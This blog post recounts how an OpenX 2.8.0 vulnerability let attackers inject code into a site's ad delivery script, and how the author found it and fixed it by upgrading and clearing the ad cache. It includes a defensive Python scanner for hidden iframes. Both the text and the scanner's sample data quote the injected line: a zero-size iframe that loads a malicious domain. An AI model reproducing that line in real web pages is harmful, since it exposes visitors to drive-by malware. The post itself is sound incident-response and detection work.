OpenX vulnerability leads to site hack and malware spreading

A client of mine recently had his site start distributing malware due to an OpenX vulnerability. He was using 2.8.0.

Here’s how I found the problem and how I fixed it.

We first knew something was up when Firefox started displaying this warning when trying to access the site:

[Image: Firefox "Reported Attack Site" warning]

Using Google’s Webmaster tools to find out which pages were infected, I traced the problem to OpenX (instead of ExpressionEngine or other software) using the Web Developer plugin for Firefox. Here’s what worked for me:

  1. Install and enable the plugin and enable the toolbar
  2. Click on Information > View JavaScript (See photo below)
  3. Search on the page for “iframe”

[Image: Web Developer toolbar, Information > View JavaScript]

And that’s how I found it, even though I couldn’t find the iframe in the source of any of the pages I looked at. The reason is that in OpenX, the /www/delivery/ajs.php file dynamically generates JavaScript that is loaded every time someone views an ad on your site, so the injected code never appears in the page’s own HTML. The malware-ridden JavaScript that was loading was at http://www.example.com/openx/www/delivery/ajs.php?zoneid=3&cb=20705736901&loc=http%3A//example.com/ where example.com is the domain name. The content that was added looked like this:

document.write('<iframe src="http://banan.uk.to/stats?counter=198" width=0 height=0></iframe>'); 

and was at the very top of the file.

banan.uk.to is the bad domain.
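As an added example (not code from the post or from OpenX), here is a small Python checker for the thing the Web Developer toolbar showed above: it takes the JavaScript that ajs.php serves, finds any iframe written from it that is sized 0x0 or styled invisible, and reports the domains those iframes point at, so you can compare them against the ad domains you actually expect. It also scans every file under an OpenX var/cache/ directory the same way, which is useful before and after the cache clearing mentioned in the edit below. The sample ajs.php output is constructed: the first line is the injected iframe from the post, the rest is made-up ordinary delivery code (zone, banner id and example.com hostnames are placeholders). The cache file names and the assumption that cached delivery code is stored as plain files are mine, not OpenX’s documented layout.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Constructed sample of what ajs.php served on the compromised site: the injected
# zero-size iframe from the post at the top, followed by ordinary-looking OpenX
# delivery output (zone id, banner id and hostnames are made-up placeholders).
SAMPLE_AJS_OUTPUT = """\
document.write('<iframe src="http://banan.uk.to/stats?counter=198" width=0 height=0></iframe>');
var OX_1a2b3c = '';
document.write('<a href="http://example.com/openx/www/delivery/ck.php?n=1a2b3c" target="_blank"><img src="http://example.com/openx/www/delivery/avw.php?zoneid=3&amp;n=1a2b3c" border="0" alt="" /></a>');
document.write('<iframe src="http://ads.example.com/banner.html" width="300" height="250" frameborder="0"></iframe>');
"""

# An <iframe ...> tag anywhere in the served script, with its attribute text captured.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name="value", name='value' or bare name=value (the injected line used bare width=0 height=0).
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def parse_attrs(attr_text):
    """Turn the inside of an HTML tag into a {name: value} dict; exactly one of the
    three value groups matches for each attribute, the others are None."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def is_hidden(attrs):
    """An iframe counts as hidden when it is sized 0 or 1 px, or styled invisible."""
    def px(value):
        return value.strip().lower().rstrip("px").strip()

    size_hidden = px(attrs.get("width", "")) in ("0", "1") or px(attrs.get("height", "")) in ("0", "1")
    style = attrs.get("style", "").replace(" ", "").lower()
    style_hidden = "display:none" in style or "visibility:hidden" in style
    return size_hidden or style_hidden


def find_hidden_iframes(js_text):
    """Return [(src, width, height), ...] for every hidden iframe the script writes."""
    findings = []
    for m in IFRAME_RE.finditer(js_text):
        attrs = parse_attrs(m.group(1))
        if is_hidden(attrs):
            findings.append((attrs.get("src", ""), attrs.get("width", ""), attrs.get("height", "")))
    return findings


def injected_domains(js_text):
    """Hostnames that hidden iframes load from; anything not on your ad-server list is suspect."""
    hosts = {urlparse(src).hostname for src, _, _ in find_hidden_iframes(js_text)}
    return sorted(h for h in hosts if h)


def scan_cache_dir(cache_dir):
    """Scan every regular file under an OpenX var/cache/ directory (assumed to hold
    cached delivery code as plain files) and map file name -> hidden iframes found."""
    hits = {}
    for path in sorted(Path(cache_dir).rglob("*")):
        if path.is_file():
            found = find_hidden_iframes(path.read_text(errors="replace"))
            if found:
                hits[path.name] = found
    return hits


def demo_scan():
    """Build a throwaway cache directory with one clean and one injected file (constructed
    names and contents) and scan it, so the directory scan can be exercised offline."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "zone_2.cache").write_text("document.write('<div>clean ad</div>');\n")
        Path(tmp, "zone_3.cache").write_text(SAMPLE_AJS_OUTPUT)
        return scan_cache_dir(tmp)


if __name__ == "__main__":
    for src, width, height in find_hidden_iframes(SAMPLE_AJS_OUTPUT):
        print(f"hidden iframe -> {src} (width={width!r}, height={height!r})")
    print("domains:", injected_domains(SAMPLE_AJS_OUTPUT))
    print("cache hits:", demo_scan())
```

To use it against a live site, fetch the ajs.php URL for each zone (the same URL you would see in View JavaScript) and pass the response body to find_hidden_iframes; a 0x0 iframe pointing at a domain you do not serve ads from is the signature described in this post. The 300x250 iframe in the sample is deliberately left alone, since legitimate banners are often delivered in visible iframes.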

Upgrading OpenX to the most recent version, 2.8.5, eliminated the vulnerability and removed the iframe from the site’s javascript.

I hope this helps someone. Let me know in the comments if you have questions.

Edit 9/20/2010: After you upgrade OpenX, or as part of the upgrade, make sure to clear your ad cache. You can safely delete everything in openx/var/cache/, where “openx” is your OpenX installation.


Posted on Mar 26, 2010 - 01:03 PM

Comments:

Do you still have that problem after upgraded to 2.8.5?

By [email hidden] on Apr 03, 2010 - 07:56 PM



Nope, upgrading to 2.8.5 eliminated the problem.

By [email hidden] on Apr 05, 2010 - 03:02 AM



I get this same warning all of the time. When I have time today, I’ll read through your tutorial and try to fix it on my computer. I have bookmarked it for now. There is nothing worse than getting a computer virus.

Thanks!
-Mike

By Facebook Analytics on Jan 24, 2011 - 12:02 PM
